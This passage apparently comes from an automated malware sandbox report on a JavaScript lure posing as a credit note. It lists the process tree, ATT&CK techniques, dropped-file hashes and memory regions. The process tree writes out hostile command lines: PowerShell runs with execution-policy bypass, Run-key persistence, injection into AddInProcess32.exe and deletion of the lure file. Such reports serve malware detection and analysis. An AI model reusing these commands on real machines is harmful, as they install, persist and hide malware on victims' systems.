          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            4⤵
              PID:2128
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnvpd.ps1'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnvpd.ps1'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:812
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnvpd.ps1"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:60
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:556
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3120
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3544
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\icefh.ps1"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3524
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\pesister.ps1"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4084
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps1
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3020
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4600
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4660
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3620
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4092
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3744
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3988
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:208
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1504
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4592
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                5⤵
                  PID:3616
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  5⤵
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:3008
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js"
                4⤵
                  PID:1724

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Command and Scripting Interpreter

          2
          T1059

          JavaScript

          1
          T1059.007

          PowerShell

          1
          T1059.001

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Defense Evasion

          Indicator Removal

          1
          T1070

          File Deletion

          1
          T1070.004

          Modify Registry

          1
          T1112

          Obfuscated Files or Information

          1
          T1027

          Command Obfuscation

          1
          T1027.010

          Credential Access

          Discovery

          Query Registry

          1
          T1012

          Remote System Discovery

          1
          T1018

          System Information Discovery

          2
          T1082

          System Location Discovery

          1
          T1614

          System Language Discovery

          1
          T1614.001

          System Network Configuration Discovery

          1
          T1016

          Internet Connection Discovery

          1
          T1016.001

          Lateral Movement

          Collection

          Command and Control

          Web Service

          1
          T1102

          Exfiltration

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\icefh.ps1
            Filesize

            835KB

            MD5

            c531cf30a3f52fad2b85f1544b2b8451

            SHA1

            e50797aab81c641489e5116f2c63501aa785e4d7

            SHA256

            b63a5a3bc89ef97bfc9c0ac782c5d5bb7aad9f2c05cd7d706814666d4ae8abe6

            SHA512

            cb88e2f649df436e24f22e22f5878df6921b2acb0ec981c8b46087558a24a5a7a3b010e2719633c002529104d9956cabe00e90a9555871708037ebf035c220e7

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ireyr.ps1
            Filesize

            431B

            MD5

            c95dcffaad056a389e2262623f45e739

            SHA1

            f1b5b346c97b1c37c760da0c5b0f4a5b64a2ce59

            SHA256

            22464fa37f28b5fe0c442a8b61e23fe5cf953d5d5d24070078270d451c65f7ca

            SHA512

            95393f26191d67132ffb236716abf673b1e898eada161f0534c24cf36e333eae0c31ef49aa3078b51389ae21b38dd1052ca808e695848fc6cce7d06cc57e6862

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnvpd.ps1
            Filesize

            426B

            MD5

            6fd7aeb823774dfec9be79c9afa1024b

            SHA1

            36b97d58c3cb956e1975b643eb275cb798588a25

            SHA256

            7b65708c0c71857c909140973259cd2ac18d7368513109553ef97d65b323917e

            SHA512

            13c732c308497fd51592c64737726263027f4ae91ad37716c525c0cdb21024c43eb9975e576f75a093f8b39cc0c06276b88cf803aa79af029f5bcc8baaec9362

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            223bd4ae02766ddc32e6145fd1a29301

            SHA1

            900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

            SHA256

            1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

            SHA512

            648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            169e59a236ee5f087221634184f9e431

            SHA1

            5aff2937073d1fa3cd2b377a3f0c631502f52174

            SHA256

            932e7b66f3df82d1e44e6e59b1a8adaa13f50f80388dcc5a2bcc06a148a94975

            SHA512

            c0ccc2f187e51caa50ae0cad311e67c276a400446cc90bc7ba485d1f9e456ae5d4e9f254f947205c94a44b92b8e836f93b4799bd1ef1dd0dc9997c8c7e4c37ab

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e87c8fca81877e269e81d938fece2852

            SHA1

            f1fbbd4e2843c3c175ea3bdd3bc4e21a9941963b

            SHA256

            255987484eb604da58b52aa81814daa5b8d94457662d20e3d018b58d7a2cc9c0

            SHA512

            be75ce1ad00df9fe5f38b95701b5a06be8ca542d622fe704488f672281adfb57f2b58f5194cfe4a44bc4369a8c12393bff246af6ebe66b159787f73186c8da2b

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            948B

            MD5

            c1a54dd5a1ab44cc4c4afd42f291c863

            SHA1

            b77043ab3582680fc96192e9d333a6be0ae0f69d

            SHA256

            c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

            SHA512

            010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            367b1c81198bfdcdba813c2c336627a3

            SHA1

            37fe6414eafaaed4abb91c1aafde62c5b688b711

            SHA256

            1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced

            SHA512

            e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            2465e6dcb39dbbb0d548ee8dd9b5e5db

            SHA1

            ba4d05bee0f2b198cb510e7ddbea36c3aaa9d5f3

            SHA256

            268fd499c283349bec2a87bc99cb6ddf61aba940b3417f3ec438595f8c93c44e

            SHA512

            43e9080271a9c170d10f18537fd95570968bcb4d758584566e7976893cb3130a1fd690a52f341c9fd4037f81a3e05ff4271a29bbb6e3a19aeb3886b4357c92d0

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            04c9ebf9c23c1d4d4a08c16e20fcceed

            SHA1

            67044e3f04584acefef2e09c2584e22e70fc5df4

            SHA256

            5ba65623b2739407ddd1fa8d75335ee54a3575893bc6a226182972c1ef881e58

            SHA512

            84cf13081ef3162995557677cfdae002ab7af81cf53ca874fbb046aa26facc375f8b533e6d2899240b3bdb06d26c6b322b60c4eca9a2a9570c54ba6d0350cd69

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            693baf43e3d5fefa0883380c7a77c69a

            SHA1

            f3e6115432504e8bd401d8c0ff2da43e708707e5

            SHA256

            27a3015931d1f72ce982cf8f9d38dc99219ea2bb9bda4ec7b09dca9bd1122e9e

            SHA512

            29c5e093f3f86c38246fe5f1c5d6110f315937916f139289f52dbbb1e67d4f5f46e4cc928ff03ce19b91cf1d8310d40dadc65812399829da8c94f0c6f9e3f5cc

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            a68fcc3482ebb381cd7eb80d4dfc7ac9

            SHA1

            68f694b1b7999996678244d8ef9d95f520ec2e39

            SHA256

            1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0

            SHA512

            a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            012245604d1f9b30879904558e292da8

            SHA1

            e48ed6db7b52f6de8287fc5d7f6ea100326adfdc

            SHA256

            0f7c853bc431a078e6c661be3ac34d9bd0d2ac533f49eda183887122dfc02f0c

            SHA512

            78506118229cbcd2195b029912e769d1e2715471a24431a772c7a663493c9dccef8738bae29ca8ac0d227a2ace3f902fd9ec018fa5be3faa137efe19c1c51d10

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            331841fe482ffe8b1cc1509733d8ca67

            SHA1

            1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8

            SHA256

            14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f

            SHA512

            039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            1536159346e9a2061e905bb38ac9fd35

            SHA1

            eff17db4721dc0add117ed399b839130d27675d4

            SHA256

            6b0eebfc544130c7a8f7d0e45c8e0b86748c13b528bc9948f216a76d8be2b88f

            SHA512

            fab6f66ac2bc68e2a82199da2519c7aae2d629603450175b69336097111e57f49fbea8b3903f7a106150032d8e5c653a90f681a10d7be668bff2bcdb798eb4ee

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            1ef85a547edc27c13271009c36d9a8de

            SHA1

            84197cd759db579e2e4bd7c03aa4de36b515c1fd

            SHA256

            c2c5895f3a9356b6be3feeeb3ce2878d498ab230370532189f1156a9f848a14d

            SHA512

            65cf5104560f49b9a6dba0d901db4529ef416202eed3fcf6b28be86f8fb4cddc931400be8d4723198750226123d2a711dba83166dbe4c507ffcbcf8f5ecbcb41

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            ce4ba855ff084f34700780c7ef93027a

            SHA1

            6bc10ecf8bacc5e9f4110154fa755d2c2869878c

            SHA256

            2195b737a8f8b6cf33ca2489c555b0717cb3f199b349a88a8d3aa92579f155d1

            SHA512

            8d02efee2f6a77f199403b340b333452c3f53222f2d692beeaf405fc39bdb583242cfbdb38ff13b98267fa93ed20a4335b16ad13b0ecbca9bb9fde3ca4f9243f

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ndxmt4b5.ljn.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\dll01.txt
            Filesize

            26B

            MD5

            1412b18e5013007f061640d90f2fb329

            SHA1

            d8b21231fd33ff936867507f11f74cdb6f3bf157

            SHA256

            3abb143c813b1842913dfbc64d371413a04945ec8158fbd89108f4e15d00e209

            SHA512

            5dd96c91cac29755a528246f215f0250821d49384fceb8cca68a6e5728dbec040cf5e03df697e05921613e35f38a31353c63caa988ded9562b941ebbb74e06d3

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\dll01.txt
            Filesize

            52KB

            MD5

            fc24a123e142a55818afb0a8e86a1b5f

            SHA1

            5a000b63aac745adf898a85ac82fb72a14144e10

            SHA256

            0518b272f1942016ff4d1e919e50f1a1149c980a41de9c1b7964f4abe8d5f522

            SHA512

            1398c9e6ba60663e8d7b16cf72b083079235e22a74ae1c53dd8eaff479eaa512c390e63bed6c136f11b9613d129f144b270e6e59c01363080cbd4fa28b0e4500

            Download Submit

          • C:\Users\Admin\AppData\Roaming\pesister.ps1
            Filesize

            231B

            MD5

            5b22a01655beb09d379869b1784a46ac

            SHA1

            f97528b16ca841dd35f735e9845a43d03c8313b9

            SHA256

            384cec4d0e386a508b76421bb8d24044b4691957abf3a0f968b2bb2a30716f32

            SHA512

            091681d4fd923616936f57a52240764be7ce8467a6266272b558ba80e523c83f72e1c53c392087822bd313ef7438e4e43e7d735f402a2fb92bddff907940522d

            Download Submit

          • memory/60-110-0x00000234DE490000-0x00000234DE6AC000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/208-267-0x0000020A4C170000-0x0000020A4C38C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/812-113-0x00000260579F0000-0x0000026057C0C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/1504-279-0x000001BCC0230000-0x000001BCC044C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/2080-42-0x000002EE8BAC0000-0x000002EE8BACA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/2080-36-0x000002EEA40C0000-0x000002EEA42DC000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/2080-117-0x000002EEA40C0000-0x000002EEA42DC000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/2356-40-0x0000014952480000-0x000001495269C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/2444-0-0x00007FFD41BF3000-0x00007FFD41BF5000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2444-24-0x00007FFD41BF0000-0x00007FFD426B1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2444-123-0x00007FFD41BF0000-0x00007FFD426B1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2444-11-0x00007FFD41BF0000-0x00007FFD426B1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2444-12-0x00007FFD41BF0000-0x00007FFD426B1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2444-122-0x0000018E18420000-0x0000018E1863C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/2444-13-0x00007FFD41BF0000-0x00007FFD426B1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2444-10-0x0000018E7F070000-0x0000018E7F092000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2444-35-0x0000018E18420000-0x0000018E1863C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3008-151-0x0000000005260000-0x00000000052F2000-memory.dmp

            Filesize

            584KB

            Download

          • memory/3008-166-0x0000000006600000-0x0000000006618000-memory.dmp

            Filesize

            96KB

            Download

          • memory/3008-165-0x00000000061B0000-0x0000000006216000-memory.dmp

            Filesize

            408KB

            Download

          • memory/3008-152-0x0000000005200000-0x000000000520A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/3008-150-0x0000000005810000-0x0000000005DB4000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/3008-149-0x0000000005140000-0x00000000051DC000-memory.dmp

            Filesize

            624KB

            Download

          • memory/3008-146-0x0000000000400000-0x0000000000438000-memory.dmp

            Filesize

            224KB

            Download

          • memory/3020-187-0x0000016DEF0C0000-0x0000016DEF2DC000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3120-185-0x000001FA7EA60000-0x000001FA7EC7C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3120-177-0x000001FA7EA60000-0x000001FA7EC7C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3524-148-0x0000019A72120000-0x0000019A7233C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3524-135-0x0000019A71D80000-0x0000019A71D8A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/3544-180-0x0000012A428B0000-0x0000012A42ACC000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3544-182-0x0000012A428B0000-0x0000012A42ACC000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3620-218-0x00000183CB1E0000-0x00000183CB3FC000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3744-242-0x00000224D3430000-0x00000224D364C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3988-253-0x0000020A7AF60000-0x0000020A7B17C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/3988-255-0x0000020A7AF60000-0x0000020A7B17C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4068-66-0x0000020C68720000-0x0000020C6893C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4084-186-0x000001B1419A0000-0x000001B141BBC000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4092-230-0x000001F720B40000-0x000001F720D5C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4600-190-0x000001F2F3910000-0x000001F2F3B2C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4660-204-0x0000021D7E840000-0x0000021D7EA5C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4660-206-0x0000021D7E840000-0x0000021D7EA5C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4692-67-0x000001E853C90000-0x000001E853EAC000-memory.dmp

            Filesize

            2.1MB

            Download